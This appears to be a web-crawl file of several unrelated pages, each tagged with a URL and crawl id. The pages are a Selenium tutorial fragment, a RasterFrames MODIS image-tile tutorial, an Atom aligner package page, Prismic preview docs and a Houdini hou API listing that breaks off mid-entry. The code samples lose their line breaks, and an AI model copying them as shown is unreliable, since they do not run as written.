STEP 5: Locate ‘Your Email’ text field which is to the left of ‘Your Name’ text field and enter the text STEP 6: Locate ‘Your Name’ text field which is to the right of ‘Your Email’ text field and enter the text STEP 7: Locate the web element ‘Selenium Tutorial’ and open it STEP 8: Locate the web element ‘Java Tutorial’ and open it STEP 9: Close the browser to end the program Related Posts:
https://www.softwaretestingmaterial.com/selenium-relative-locators/
CC-MAIN-2021-31
en
refinedweb
In this tutorial, we show how to display RGB (true-color) and false-color image tiles contained in a RasterFrames data structure. RasterFrames brings the characteristics and capabilities of DataFrames to raster imagery data. Tiles are subsets of scenes and scenes are discrete instances of Earth observation data with specified spatial extent, date-time, and coordinate reference system. RGB images are also called true- or natural-color images as these contain the wavelengths that human vision processes. RGB channels can also be assigned to other spectral bands, such as the near-infrared and short-wave infrared bands. In this instance, the composite RGB images are now called false-color images. Below we give examples of how to produce false-color image tiles in addition to true color image tiles. Import Libraries We will start by importing the Python libraries used in this example. from earthai.init import * from pyrasterframes.rasterfunctions import * Query the Earth OnDemand Catalog Next, we query the Earth OnDemand catalog to obtain imagery with the earth_ondemand.read_catalog function. There are a number of ways to query the catalog. This example is querying the MODIS Terra and Aqua surface reflectivity catalog centered on a specific point with longitude-latitude coordinates. This geospatial point corresponds to a location near Palmas, Brazil. We have also arbitrarily selected images collected during the months of September and October of 2019. catalog = earth_ondemand.read_catalog( geo="POINT(-50.8 -10.5)", start_datetime='2019-09-01', end_datetime='2019-10-31', max_cloud=5, collections='mcd43a4', ) Create and Display True-color Tiles Now we read the results of the Earth OnDemand query into a RasterFrame using the spark.read.raster function. For this example, we'll select the red, green, and blue MODIS bands: B01, B04, B03, respectively. Simply for clarity we also rename the B01, B04, and B03 columns as red, green, and blue with the withColumnRenamed method. true_color_rf = spark.read.raster(catalog, catalog_col_names=['B01', 'B04', 'B03']) \ .withColumnRenamed('B01', 'red') \ .withColumnRenamed('B04', 'green') \ .withColumnRenamed('B03', 'blue') Now we will create a new tile column that represents the composite image tiles of the red, green, and blue channels. This is otherwise known as a true-color image. To accomplish this we use the rf_render_png function from the pyrasterframes.rasterfunctions library. This function takes three tile columns, which in this case are the red, green, and blue bands of the MODIS imagery, and combines them into a single composite. It then converts this composite to a PNG-encoded image. The two lines of code below create a new column png that is made up of true-color composite tiles and displays the first five true color tiles in a notebook cell. true_color_rf = true_color_rf.withColumn('png', rf_render_png('red', 'green', 'blue')) true_color_rf.select('png') Create and Display False-color Tiles You can also assign other spectral bands to the RGB channels producing false-color images. This can highlight Earth image properties such as differentiating between snow, ice, and clouds or showing where flooding has occurred. A very common false-color image utilizes the near-infrared, green, and red bands to show vegetation and vegetated areas. The code below follows the same steps as for generating the true color image tiles, but now we assign the MODIS near-infrared band to the red channel, the red band to the green channel, and the green band to the blue channel. In these image tiles, the red colors depict areas of vegetation. Dark red represents dense vegetation. false_color_rf = spark.read.raster(catalog, catalog_col_names=['B02', 'B01', 'B04'])\ .withColumnRenamed('B02', 'nir') \ .withColumnRenamed('B04', 'green') \ .withColumnRenamed('B01', 'red') false_color_rf = false_color_rf.withColumn('png', rf_render_png('nir', 'red', 'green')) false_color_rf.select('png') Please sign in to leave a comment.
https://docs.astraea.earth/hc/en-us/articles/360051906152-How-to-Create-and-Display-RGB-Image-Tiles-with-RasterFrames
CC-MAIN-2021-31
en
refinedweb
Aligner add-on to support Javascript. =: assignment let foo = "bar"let test = "notest"let hello = "world" +=, -= and other with = let foo = "bar"let test += "notest"let hello -= "world" :: Object random = {troll: "internet",foo: "bar",bar: "beer"} ,: Items in arrays ["helloText", 123456, "world"]["foo" , 32124, "bar"] from: import * from 'fs'; import * from 'https'; Align Comments options on) let hello = 'world'; // line 1let foo = 'bar'; // line 2 Aligner must be installed along with this package. For more information, please check out Aligner Good catch. Let us know what about this package looks wrong to you, and we'll investigate right away.
https://github-atom-io-herokuapp-com.global.ssl.fastly.net/packages/aligner-javascript
CC-MAIN-2021-31
en
refinedweb
Previews &. Using an official Prismic starter project? If you are using one of our official Prismic starter projects, then you should already have all the code in place that you need for Previews and the Prismic Toolbar! If you're not using an official Prismic project, then follow the rest of the steps below. The Link Resolver function This requires the use of a Link Resolver function so that the preview endpoint knows where to redirect to. You can learn more about link resolving by checking out our Link Resolver page. // Example preview endpoint for NodeJS with ExpressJS app.get('/preview', function (req, res) { // preview code shown below }); When requested this endpoint must: - Retrieve the preview token from the token parameter in the query string - Retrieve the documentId the token into the getPreviewResolver method as shown below. (@prismicio/client kit V4.0.0 and above) const Prismic = require('@prismicio/client'); const linkResolver = require('./path/to/the/link-resolver.js'); exports.prismicPreview = async (req, res) => { const { token, documentId } = req.query; const api = await Prismic.client(''); const redirectUrl = await api.getPreviewResolver(token, documentId).resolve(linkResolver, '/'); cookies.set(...) // set cookie res.redirect(302, redirectUrl); } For anyone using a version of the @prismicio/client kit older than V3.0.1, then you should pass this token into the previewSession method as shown below. const Prismic = require('@prismicio/client'); const linkResolver = require('./path/to/the/link-resolver.js'); const apiEndpoint = ''; // Example preview endpoint for NodeJS with ExpressJS app.get('/preview', function (req, res) { const token = req.query.token; Prismic.client(apiEndpoint, { req: req }) .then((api) => api.previewSession(token, linkResolver, '/')) .then((url) => { res.redirect(302, url); }); }); Are you using the @prismicio/client library? This last step is only required if you are not using the @prismicio/client library to retrieve your API object. If you are using the Prismic.client: - nodejs - react var Cookies = require('cookies'); // Example ref selection for NodeJS with ExpressJS const cookies = new Cookies(req, res); const previewRef = cookies.get(Prismic.previewCookie); const masterRef = api.refs.find(ref => { return ref.isMasterRef === true; }); const ref = previewRef || masterRef.ref; import Cookies from 'js-cookie'; const previewRef = Cookies.get(Prismic.previewCookie); const masterRef = client.refs.find(ref => { return ref.isMasterRef === true }).ref; const ref = previewRef || masterRef; Then here is an example that shows how to use this ref in your query: // Then in your query, specify the ref like this api.query( Prismic.Predicates.at('document.type', 'blog_post'), { ref } ).then(function(response) { // response is the response object, response.results holds the documents });.
https://prismic.io/docs/technologies/previews-and-the-prismic-toolbar-javascript
CC-MAIN-2021-31
en
refinedweb
Values hou.rampParmType.Color hou.rampParmType.Float Houdini 18.5 Python scripting hou Enumeration of ramp types. hou.rampParmType.Color hou.rampParmType.Float Module containing functions related to inverse kinematics. Module containing Qt related functions. Functions and classes for running a web server inside a graphical or non-graphical Houdini session. Abstract base class for all keyframe class. Class representing the default keyframe type, a numerical keyframe. Adds an Animation Layer to an existing Animation Layer Mixer. hou.convertKeyframesToClipData() hou.createAnimationClip() Creates an Animation Clip Mixer from the parameters in the Channel List. hou.createAnimationLayers() Creates an Animation Layer Mixer from the parameters in the Channel List. hou.removeAnimationLayer() Removes an Animation Layer from an existing Animation Layer Mixer. Represents the definition of a houdini digital asset (HDA). User-defined Python module containing functions, classes, and constants that are stored with and accessed from a digital asset. Stores miscellaneous options about a houdini digital asset (HDA). Represents a "section" of data stored along with a digital asset. User-defined Python module containing the implementation and registration code of a python viewer state stored in a digital asset. Module containing functions related to Houdini Digital Assets. Given a node type category, operator name and digital asset library path, return an HDADefinition object. Return None if no such installed digital asset definition matches the arguments. Enumeration of types of events that can happen for digital asset libraries. Enumeration of digital asset license permission levels. hou.ChannelGraphSelection A copy of an Animation Editor Graph Selection. A copy of a list of channels from Channel List or Animation Editor. Class representing a CHOP node. Class representing an animation clip. Evaluate a Bezier interpolation spline for an animated parameter using the left keyframe’s outgoing value, tangent, and acceleration and the right keyframe’s incoming value, tangent, and acceleration. hou.commitPendingKeyframes() Evaluate an animation function for an animated parameter. The return value is always the left keyframe’s outgoing value. Smooth curve between the left keyframe’s outgoing slope and the right’s incoming slope. Repeats the motion between two times. Repeats the motion between two frames, lining up the first repeated value with the left keyframe’s value. Repeats the motion between two times, lining up the repeated values with the left keyframe’s value. Repeats the motion between two times. Interpolates between the left keyframe’s outgoing value and the right keyframe’s incoming value. Interpolates between the left keyframe’s outgoing value and the right keyframe’s incoming value. Interpolates between the values of two keyframes. Interpolates between the left keyframe’s outgoing value and the right keyframe’s incoming value. Interpolates between the values of two keyframes. Interpolates between the values of two keyframes. Linearly interpolates between the left keyframe’s outgoing value and the right keyframe’s incoming value. Creates a smooth curve between the left keyframe’s incoming slope and the right keyframe’s outgoing slope. Creates a straight line from the left keyframe’s incoming value, matching the left keyframe’s incoming slope. Creates a straight line from the right keyframe’s outgoing value, matching the right keyframe’s outgoing slope. Linearly interpolates between keyframes using quaternions. Evaluate an interpolation function for an animated parameter that gives a smooth curve between the left keyframe’s outgoing value and the right keyframe’s incoming value, using the left’s outgoing slope and acceleration and the right’s incoming slope and acceleration. Repeats the motion between two times. Repeats the motion between two times. Fits a spline through consecutive keyframe values. Matches the incoming and outgoing values and slopes. Matches the left keyframe’s incoming slope. Matches the right keyframe’s outgoing slope. Return Houdini’s cook update mode (Auto Update/On Mouse Up/Manual) that is displayed in the status bar. Enumeration of interface update modes. Return Houdini’s cook update mode (Auto Update/On Mouse Up/Manual) that is displayed in the status bar. An agent primitive. An agent’s animation clip. The shared data for an agent primitive. An agent’s layer. Stores metadata in an agent definition. The rig of an agent primitive. An agent’s shape. A shape binding in an agent’s layer. A deformer for agent shapes. The shape library of an agent primitive. A group of transforms and channels in an agent’s rig. hou.agentShapeDeformerType Enumeration of agent shape deformer types. Crowd-related functions. A piece of data stored inside a DOP network’s simulation. Represents a dynamics node. A type of DOP data that contains an object in the simulation. A table of values stored inside a DopData. A type of DOP data that stores which DOP objects affect one another. A dynamics simulation contained inside a DOP network node. Returns the DOP Network node set as the "current" simulation in the UI. DOP related functions. Enumeration of field types. hou.setSimulationEnabled() Base class for all exceptions in the hou module. hou.GeometryPermissionError Exception that is raised when you try to modify geometry from outside of a Python SOP. Exception raised while unregistering a non-registered python viewer handle. Exception that is raised when you try to set a node’s input to something invalid. Exception that is raised when you try to call a method on a Node that isn’t supported by that type of node. Exception that is raised when you pass a sequence of the wrong length to a function. Exception class for when loading a hip file in Houdini generates warnings. Exception raised when a name conflict is detected during an operation. Exception class used to set errors on nodes implemented via Python. Exception class used to set warnings on nodes implemented via Python. Exception class for when an operation attempted to use a feature that is not available. This class is a subclass of . Exception class for when you use a stale variable to attempt to access something that was deleted in Houdini. This class is a subclass of . Exception raised while unregistering a non-registered python state. Given a truthy condition, if the condition is False then raise an AssertionError. If the condition is True, then do nothing. Search the Houdini path for the specified directory, returning a tuple of all the matches. The directory name specified should be relative to the Houdini directory. Search the Houdini path for a specified directory, returning the first match found. The directory name specified should be relative to the Houdini directory. Search the Houdini path for a specified file, returning the first match found. The filename specified should be relative to the Houdini directory. Search the Houdini path for the specified file, returning a tuple of all the matches. The filename specified should be relative to the Houdini directory. hou.findFilesWithExtension() Search the Houdini path for files with a particular extension, returning a tuple of all the matches. A subdirectory can also be optionally provided which is appended to each entry in the Houdini path before looking for files. hou.homeHoudiniDirectory() Return the path to the Houdini directory in your $HOME directory. Return the contents of the Houdini path as a tuple of strings. hou.loadCPIODataFromString() Given a binary string containing data in CPIO data format, decode the data and return a sequence of (name, value) pairs representing the data. hou.loadIndexDataFromFile() Given a file containing data in index data format, decode the data and return a dictionary representing the data. hou.loadIndexDataFromString() Given a binary string containing data in index data format, decode the data and return a dictionary representing the data. Read a binary file, returning the contents in a bytes object. Supports regular files, opdef: and oplib: paths, and http URLs. Read a file, returning the contents in a string. Supports regular files, opdef: and oplib: paths, and http URLs. hou.saveCPIODataToString() Given a sequence of (name, value) string tuples, encode that data into a string in CPIO format. hou.saveIndexDataToFile() Given a dictionary mapping strings to strings, encode that data in index data format and save it into a file. hou.saveIndexDataToString() Given a dictionary mapping strings to strings, encode that data into a string in index data format. This class is the base class for an enumeration value. It cannot be instanced and is not meant to be used directly by the user. hou.InterruptableOperation Use this class to turn any Python code block into an interruptable operation. Use this class to collect multiple redraws for any Python code block and only redraw once. Use this class to disable undos within a Python code block. Used to group all undos within a Python code block into a single action. hou.allowEnvironmentToOverwriteVariable() Allow (or disallow) an environment variable to overwrite the value of a global variable saved in a hip file. Compares two numbers and returns True if they are almost equal in terms of how far apart they are when represented as floating point numbers. hou.appendSessionModuleSource() Appends the given source code to the hou.session module. The appended code is made available immediately. You do not have to re-import hou.session. hou.applicationCompilationDate() Returns the application’s compilation date. Returns the application name. hou.applicationPlatformInfo() Returns a string containing information about the system that compiled this version of Houdini. Returns the application’s version number as a tuple of integers – (major_version, minor_version, build_version). hou.applicationVersionString() Returns the application’s version number as a string. Functions related to playing audio using Houdini’s playbar. hou.chopExportConflictResolutionPattern() Returns a CHOP node path pattern to take precedence when exporting to the same channel. Exits Houdini, returning the exit code to the operating system. If suppress_save_prompt is false, this function asks the user if he/she wants to save. If the user presses "Cancel", the exit will be canceled and the next statement will execute. Functions for working with the current scene (.hip) file. Enumeration of the hip file event types that can be handled by callback functions. Houdini and 3D related math functions. Module containing hotkey related functions. Return whether the application is an apprentice (non-commercial) version. Return the category of license (Commercial, Apprentice, ApprenticeHD, etc.) in use. Enumeration of license category values. Returns the name of the computer used with this Houdini session. Returns the number of threads used for processing. Enumeration of numeric value types. Release the currently held Houdini license. Enumeration of hip file save modes. Returns the scale factor from Meters-Kilograms-Seconds units into the Houdini session’s current units. Returns the scale factor from Meters-Kilograms-Seconds units into the Houdini session’s current units. This module is used to define custom classes, functions and variables that can be called from within the current Houdini session. The contents of this module are saved into the .hip file. hou.sessionModuleSource() Returns the contents of the hou.session module. hou.setChopExportConflictResolutionPattern() Sets a CHOP node path pattern to take precedence when exporting to the same channel. Sets the maximum number of threads to use for multi-processing. hou.setSessionModuleSource() Sets the contents of the hou.session module. The new contents is made available immediately. You do not have to re-import hou.session. hou.startHoudiniEngineDebugger() Starts a Houdini Engine debugging session in Houdini if no session is currently active hou.updateProgressAndCheckForInterrupt() Deprecated: Use InterruptableOperation. Returns the user name for the current Houdini session. This class stores information about a Geometry attribute. Used for detecting when contents of geometry have changed Each Edge object resides inside a Geometry object and stores an edge. Edges are reprsented as pairs of points. A named group of edges inside a Geometry object. A Face is a kind of geometry primitive (Prim object) that contains a sequence of vertices (Vertex objects). How these vertices are used depends on the type of face; polygons, for example, use the vertices to define the edges of the polygon, while NURBS curves use them as control points. A Geometry object contains the points and primitives that define a 3D geometric shape. For example, each SOP node in Houdini generates a single Geometry object. Geometry delta provides access to the geometry differences (deltas) stored by some Geometry nodes such as the edit SOP. Geometry Ray Cache allows caching of ray-intersection structures. hou.IndexPairPropertyTable Describes properties of an index pair attribute. A packed fragment primitive. A packed geometry primitive. A packed primitive. Represents a point on a geometry primitive, such as a polygon or NURBS surface. A named group of points inside a Geometry object. A Polygon is a kind of Face whose vertices are connected via straight lines. Each Prim resides inside a Geometry object and stores some sort of 3D geometric primitive, like a polygon, a NURBS curve, or a volume. Each primitive usually contains a set of Vertex objects, each of which references a Point object. A named group of primitives inside a Geometry object. A Quadric is a kind of geometry primitive (Prim object) that represents a 3-dimensional surface defined by a quadratic polynomial equation (e.g. a sphere or tube). A class that represents a geometry component selection. Represents a surface node. Represents the code of a surface node. A Surface is a kind of geometry primitive (Prim object) that contains a two dimensional grid of vertices (Vertex objects). How these vertices are used depends on the type of surface: meshes, for example, use the vertices to define a quadrilateral mesh, while NURBS surfaces use them as control points. A VDB is a kind geometry primitive (Prim object) that stores data in a three dimensional grid of voxels. Existing inside a Geometry object, a Vertex object is contained in exactly one Prim, and references exactly one Point. A named group of vertices inside a Geometry object. A Volume is a kind geometry primitive (Prim object) storing a three dimensional array of voxels. Enumeration of attribute data types. Enumeration of geometry attribute types. Enumeration of component loop types. Enumeration of geometry component types. Enumeration of primitive types. Enumeration of scale inheritance modes for transforms. Enumeration of voxel data types. Minimal class representing a compositing view pane. Represents a compositing node. Enumeration of image depths (data formats) for representing the pixels in an image plane. Return the resolution of an image in a file. hou.saveImageDataToFile() Create an image file from color and alpha pixel data. An abstract base class for a network item that can be used as an input to nodes in the same network, but which is not a node itself. Represents a lighting node. Represents a lighting node. A small dot in a network that allows wires to be routed along specific paths without affecting the data passing through them. The base class for all visible elements within a network. The base class for all visible elements within a network, such as Nodes, Network Boxes, and Sticky Notes. The base class for all nodes in Houdini (objects, SOPs, COPs, etc.) An instance of this class corresponds to exactly one instance of a node in Houdini. Represents a connection (wire) between two Nodes. A tree structure designed to contain information about nodes and the data they generate. Information common to all instances of a type of node, such as the parameters. This kind of NodeType contains extra attributes specific to SOP nodes. A node-like item that appears inside subnets and corresponds to the node wired into the subnet. Represents a task node. Enumeration of types of appearance change events that can happen to nodes. Change the current node. Houdini has one current node, analogous to a current directory in a file system. If a relative path is given, it is relative to the node returned by hou.pwd(). Clears the selected state for all nodes, network boxes, and other subclasses of hou.NetworkMovableItem in the Houdini session. Copy all given nodes to a new place in node hierarchy. hou.copyNodesToClipboard() Copies a list of nodes to the clipboard. Return the default color for a particular network element. Given a path string, return a NetworkMovableItem object. Return None if the path does not refer to an item. Given an item’s session id and an item type, return a NetworkMovableItem object. Return None if the id does not correspond to a valid item. Takes a sequence of node path strings and returns a tuple of NetworkMovableItem objects. Move all given nodes to a new place in node hierarchy. hou.networkBoxBySessionId() Given a network box’s session id, return a NetworkBox object. Return None if the id does not correspond to a valid network box. hou.networkDotBySessionId() Given a dot’s session id, return a NetworkDot object. Return None if the id does not correspond to a valid dot (e.g. if the dot was deleted). Given a path string, return a Node object. Return None if the path does not refer to a node. Given a node’s session id, return a Node object. Return None if the id does not correspond to a valid node (e.g. if the node was deleted). hou.nodeConnectionBySessionId() Given a node’s session id and an input index, return a NodeConnection object. Return None if the id does not correspond to a valid node (e.g. if the node was deleted), or the specified input index is not connected. Enumeration of types of events that can happen to nodes. Enumeration of the different node flags. Takes a category object and a name, or just a full name string, and returns the corresponding NodeType object. Enumeration of node type sources. Takes a sequence of node path strings and returns a tuple of Node objects. Return the parent of the current node. hou.pasteNodesFromClipboard() Paste previously copied nodes to a given network. A shortcut for hou.pwd().hdaModule(). Given a node type name that includes the category and optionally a parent node, return the corresponding NodeType object after evaluating aliases. Return None if there is no such type with that name. If called from an evaluating parm, return the node containing the parm. Otherwise, return Houdini’s global current node. You can change this current node with hou.cd Return the root node (i.e. /). hou.selectedConnections() Return a list of all selected node connections. Return a list of all selected nodes, network boxes, sticky notes, subnet indirect inputs, and network dots. Return a list of all selected nodes. Return the setDefault color for a particular network element. Make the given node Houdini’s current node. This function is equivalent to hou.cd(node.path()). Given a tuple of path strings, return a tuple of path strings sorted in input/outputs order. Invalid node paths won’t be part of the sorted list. Given a tuple of , return a tuple of sorted in input/outputs order. hou.stickyNoteBySessionId() Given a sticky note’s session id, return a StickyNote object. Return None if the id does not correspond to a valid sticky note. hou.subnetIndirectInputBySessionId() Given a subnet input’s session id, return a SubnetIndirectInput object. Return None if the id does not correspond to a valid subnet input (e.g. if the subnet containing the input was deleted). Enumeration of TOP Node cook states. Represents a category of node types, such as surface nodes (SOPs) or dynamics nodes (DOPs). hou.chopNetNodeTypeCategory() Return the NodeTypeCategory instance for Houdini channel container (chopnet) nodes. hou.chopNodeTypeCategory() Return the NodeTypeCategory instance for Houdini channel (chop) nodes. hou.cop2NetNodeTypeCategory() Return the NodeTypeCategory instance for Houdini composite container (copnet) nodes. hou.cop2NodeTypeCategory() Return the NodeTypeCategory instance for Houdini composite (cop) nodes. hou.dopNodeTypeCategory() Return the NodeTypeCategory instance for Houdini dynamic (DOP) nodes. hou.lopNodeTypeCategory() Return the NodeTypeCategory instance for Houdini lighting (lop) nodes. hou.managerNodeTypeCategory() Return the NodeTypeCategory instance for Houdini manager nodes. The manager nodes are /obj, /out, /part, /ch, /shop, /img, and /vex. Return a dictionary where the keys are the category names (e.g. "Object", "Sop") and the values are hou.NodeTypeCategory objects. hou.objNodeTypeCategory() Return the NodeTypeCategory instance for Houdini object nodes. For example, if /obj/model is an object then hou.node("/obj/model").type().category() is hou.objectNodeTypeCategory(). hou.rootNodeTypeCategory() Return the NodeTypeCategory instance for Houdini root (/) node. There is only one instance of the root node, and it has its own node type category. hou.ropNodeTypeCategory() Return the NodeTypeCategory instance for Houdini output (rop) nodes. hou.shopNodeTypeCategory() Return the NodeTypeCategory object corresponding to shader (SHOP) nodes. hou.sopNodeTypeCategory() Return the NodeTypeCategory instance for Houdini geometry (sop) nodes. hou.topNodeTypeCategory() Return the NodeTypeCategory instance for Houdini task (top) nodes. hou.vopNetNodeTypeCategory() Return the NodeTypeCategory instance for Houdini vex builder container (vopnet) nodes. hou.vopNodeTypeCategory() Return the NodeTypeCategory instance for Houdini vex builder (VOP) nodes. An instance of an object node in the Houdini scene. Represents a network box. A named set of nodes whose contents can be from different networks. A bundle’s contents may be fixed or may be determined from a pattern, and the contents may be filtered by node type. Represents a node group. Represents a sticky note. Create a new node bundle with the specified name. Given a node bundle name, return the corresponding NodeBundle object, or None if there is not one with that name. Return a tuple containing all the node bundles in the current session. Enumeration of available node type filters. hou.selectedNodeBundles() Return a tuple containing all the node bundles that are selected in the bundle list pane. A parameter in a node. Each parameter has a unique name within its node and exists inside a parameter tuple. A tuple of one or more node parameters. Each parameter tuple has a unique name within its node. hou.addContextOptionChangeCallback() Adds a callback to be executed when a default context option is changed. The same as evalParm(). Provided for backward compatibility. Evaluate a parameter that references a node, and return the absolute path to the node. Evaluate a parameter that references a node path list, and return a space separated list of absolute node paths. Returns the value of a cook context option. hou.contextOptionConfig() Returns the string that holds the UI configuration for the default value of a context option. Returns the names of all available cook context options. Evaluate a parameter, given either an absolute or a relative path to it. Relative path searches are done from the node returned by . This function is a shortcut for hou.parm(path).eval(). Evaluate a parameter, given either an absolute or a relative path to it. Relative path searches are done from the node returned by . This function is a shortcut for hou.parmTuple(path).eval(). Return the parameter that is currently evaluating. Enumeration of available expression languages. Enumeration of file types. Returns True if the specified option exists in the current cook context. Return the value of a node’s local variable. Call this function from expressions inside node parameters. Given a path string, return a Parm object. Return None if the path does not refer to a parameter. Enumeration of Bake Chop modes. hou.parmClipboardContents() Returns the contents of the parameter clipboard as a tuple of copied parameter dictionaries. Enumeration of available parameter conditional types. Enumeration of Extrapolation methods when evaluating value outside the keyframe range. Given a path string, return a ParmTuple object. Return None if the path does not refer to a parameter tuple. hou.removeAllContextOptionChangeCallbacks() Stops all callbacks from being executed when a default context option is changed. hou.removeContextOption() Removes the default value for a cook context option. hou.removeContextOptionChangeCallback() Stops a callback from being executed when a default context option is changed. Enumeration of available script languages. Sets the default value for a cook context option. hou.setContextOptionConfig() Sets a string to hold the UI configuration for the default value of a context option. Describes a parameter tuple containing a button. Describes a parameter tuple containing data values. Describes a parameter tuple containing floating point values. Describes a folder in a parameter dialog. hou.FolderSetParmTemplate Describes a set of folders. Describes a parameter tuple containing integer values. Describes a label parameter. Unlike most other parameters, labels do not store parameter values. Describes a menu parameter containing evaluating to integer values. Note that StringParmTemplates may also have menus. Describes a parameter tuple (its name, type, etc.). This is base class for all parameter templates. A group of parameter templates used to represent the parameter layout of a node or the parameters in a digital asset definition. Parameter template for a ramp parameter. hou.SeparatorParmTemplate Template for a separator parameter. Separators are just lines between parameters and do not store any parameter values. Describes a parameter tuple containing string values. These values can be arbitrary strings or references to files or nodes Describes a parameter tuple containing a checkbox. Enumeration of data parameter types. Enumeration of folder types for FolderParmTemplates. Enumeration of parameter menu types. Enumeration of parameter data types. Enumeration of available looks for a parameter Enumeration of available naming schemes for a parameter. Enumeration of parameter template types. Enumeration of string parameter types. Represents an event that is recorded by the performance monitor and used to generate time and memory growth statistics for profiles. Represents a performance monitor profile. Represents the set of options used by the Performance Monitor and specifies the type of statistics to be recorded in a profile. Module containing performance monitor related functions. Return the number of frames per second. Return the playbar’s current frame. Note that Houdini can be on a fractional frame if fractional frames are enabled. Convert from a given frame value to a time value. Return the playbar’s current frame, rounded to the nearest integer. Enumeration of play modes for the main playbar in Houdini. The animation playbar module. Enumeration of the playbar events that can be handled by callback functions. Set the number of frames per second. Set the playbar’s current frame. Note that the frame may be a fractional value. Set the playbar’s time. Return the playbar’s current time, in seconds of playback. Convert from a given time value to a frame value, rounding the result to a integer if it is close to an integer. Add a user preference. Return a preference value. Return all the preference names. Remove a user preference. Sets a preference given a name and returns true on success. Enumeration of locations for radial menu items in Houdini. Enumeration of types for radial menu items in Houdini. Represents a render output node. Enumeration of dependency rendering methods. Use this to temporarily change the scripting evaluation context within a Python code block. A proxy object that replaces Python’s stdin, stdout, and stderr streams within Houdini. Decodes a variable or geometry attribute name that was previously encoded. Encodes any string into a valid variable or geometry attribute name. Expands global variables and expressions in a string at the current frame. hou.expandStringAtFrame() Expands global variables and expressions in a string at a given frame. Return the globals dictionary used by the parameter expression evaluation namespace. Return the value of the specified Houdini environment variable. Return the base URL for all Houdini help pages. Executes an HScript command Return the text help of an hscript command. This function is used to help re-implement hscript commands in Python. hou.hscriptExpandString() Deprecated: Use expandString. Evaluate an Hscript expression. hou.hscriptFloatExpression() Evaluate an Hscript expression as a float. hou.hscriptMatrixExpression() Evaluate an Hscript expression as a vector. hou.hscriptStringExpression() Evaluate an Hscript expression as a float. hou.hscriptVectorExpression() Evaluate an Hscript expression as a vector. hou.incrementNumberedString() Increments the number in a string, or appends a number to the string. Set the value of the specified Houdini environment variable. Unset the specified Houdini environment variable. A collection of gallery entries that can be applied to operator nodes to set their parameters to predefined values. A gallery entry that can be applied to operator nodes to set their parameters to predefined values. The base class for all SHOP nodes in Houdini. An instance of this class corresponds to exactly one instance of a node in Houdini. A class that represents a Houdini style sheet. It can be used to evaluate, test, and debug style sheet output. A module for managing galleries and their entries. A module for accessing standard render properties. Enumeration of SHOP shader types. A module for managing style sheets that are stored with the hip file. Represents a tab of shelf tools. Represents the shelf area at the top of the screen, within which shelf sets and shelf tabs exist. Superclass of shelf tools, shelf tabs, and shelf sets. Represents a collection of shelf tabs. Represents a tool on the shelf, encapsulating a script as well as a label, help, and other information. Contains functions for working with shelf tabs and shelf tools. Stores a string that expresses a pattern to select instances from a point instancer primitive by id. Guarantees the lifetime of a USD stage created by a LOP node. Stores a set of rules that define how to make a selection of scene graph primitives. Stores a description of which payloads on the USD stage should be loaded into the viewport. Used to edit the current session overlay layer that is applied to the current LOP node’s scene graph. Module containing functions related to Houdini LOP nodes. Specifies which primitives should be included and excluded during the traversal of a USD scene graph. hou.lopViewportOverridesLayer Specifies a choice between the various pxr.Sdf.Layer objects available in a object. Represents a Data Tree panetab. Class representing a Houdini desktop (a pane layout). Class representing a Houdini dialog. A floating window that contains one or more panes. Class representing a help browser pane tab. Provides methods for controlling the help browser. An interactive preview render (IPR) window. A value to adjust the appearance of a network editor without changing the underlying node data. Represents a Network Editor panetab. Describes the conditions under which a footprint ring should be displayed for a node in a network editor pane. Describes a background image that can be displayed in a network editor pane. The base class for extra shapes that can be drawn into a network editor. Describes a rectangular area that can be drawn into a network editor. hou.NetworkShapeConnection Describes a wire that can be drawn into a network editor. Describes a line that can be drawn into a network editor. hou.NetworkShapeNodeShape Describes a node shape that can be drawn into a network editor. A rectangular area of the desktop that contains one or more pane tabs. One of the tabs inside a desktop pane. Represents a Parameter Editor panetab. Represents a Performance Monitor panetab. Class representing a pane tab that can display an embedded PySide or PyQt interface. Represents the definition of a Python panel interface. Enumeration of confirmation dialog suppression options. Enumerator for the drawable display mode. hou.drawableGeometryPointStyle Enumeration used with to specify the style of points to draw. Enumerator for the drawable primitive types. Enumeration used with to specify the reference point of the text within its bounding box. Enumeration of possible read/write modes for the file chooser. Return whether or not the hou.ui module is available. Enumeration of the specialized node footprints supported by the network editor. Enumeration of possible pane link values. Enumeration of pane tab types. Enumeration of Parameter filter criteria. Enumeration of Parameter filter modes. Enumeration of the different structures that are used to view objects in the Performance Monitor panetab. Enumeration of the different formats used when viewing times in the Performance Monitor panetab. Enumeration of the different units used when viewing times in the Performance Monitor panetab. Module containing functions related to Python panels. Enumeration of the resource events that can be handled by callback functions. Enumeration of scrolling position modes. hou.secureSelectionOption Enumeration of the secure selection options used by viewer state selectors. Enumeration of dialog message severities. Enumeration of possible node generation modes by states. Enumeration of state viewer types. hou.triggerSelectorAction Enumerator representing the type of action a state selector can perform if triggered with . Module containing user interface related functions. Values representing reasons Houdini generated a particular UI event. Enumerator for UI event value types. Enumeration of the different data types that may be manipulated by a value ladder. Enumeration of the different value ladder types. An axis-aligned 3D rectangular region. An axis-aligned 2D rectangular region. Represents a color value. A 2×2 matrix of floating point values. A 3×3 matrix of floating point values. A 4×4 matrix of floating point values. An oriented 3D rectangular region. An oriented 2D rectangular region. A representation of a 3D rotation (or orientation). You can smoothly interpolate between two rotation values by interpolating between two quaternions. A Ramp represents a function that yields either floating point values or colors. You can evaluate this function between 0.0 and 1.0, and the function’s shape is determined by a sequence of values at key positions between 0.0 and 1.0. This kind of NodeType contains extra attributes specific to SHOP nodes. A sequence of 2 floating point values, with associated mathematical operations. A sequence of 3 floating point values, with associated mathematical operations. A sequence of 4 floating point values, with associated mathematical operations. This kind of NodeType contains extra attributes specific to VOP nodes. Enumeration of color spaces. Enumeration of compression types. Enumeration of ramp interpolation types. Enumeration of ramp types. Module containing Houdini-specific string manipulation methods. Represents a VEX/VOP context. Different contexts allow the use of different functions/VOPs. Represents a VOP (VEX Operator) node. Invokes the main function in a compiled VEX file, returning the exported values. hou.vexContextForNodeTypeCategory() Takes a NodeTypeCategory object and returns a VexContext object representing the context of VOP networks the node would contain. hou.vexContextForShaderType() Enumeration of the different node configurations that can be created for the inputs of a VOP node. The base class for advanced drawables. The grid (a.k.a. construction plane) in the scene viewer pane tab. A class representing a context viewer pane tab. The base class for drawables. A collection of options for the viewport flipbook dialog. The base class for a viewer resource gadget context. Represents a geometry drawable with picking and locating capabilities. Advanced drawable for drawing guide geometries. hou.GeometryDrawableGroup A container of hou.GeometryDrawable objects. Represents a component selection performed by the user in a viewport. hou.GeometryViewportBackground hou.GeometryViewportCamera hou.GeometryViewportDisplaySet A Display 